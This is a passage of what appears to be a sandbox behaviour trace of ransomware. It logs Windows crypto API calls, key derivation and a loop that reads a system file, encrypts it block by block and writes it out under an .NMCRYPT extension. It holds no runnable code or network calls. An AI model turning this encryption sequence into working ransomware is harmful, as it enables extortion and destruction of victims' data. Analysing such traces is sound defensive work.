dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.921] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.922] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0167.922] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.922] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad4b8) returned 1 [0167.922] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.922] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.922] wcslen (_String="\\\\?\\") returned 0x4 [0167.922] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad178) returned 1 [0167.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.923] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=71168) returned 1 [0167.923] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.924] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.924] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.924] GetLastError () returned 0x0 [0167.925] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.031] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.032] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.032] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.032] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.032] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.033] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.033] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.033] GetLastError () returned 0x0 [0168.033] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.034] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.034] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.034] GetLastError () returned 0x0 [0168.034] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.035] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.035] GetLastError () returned 0x0 [0168.035] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 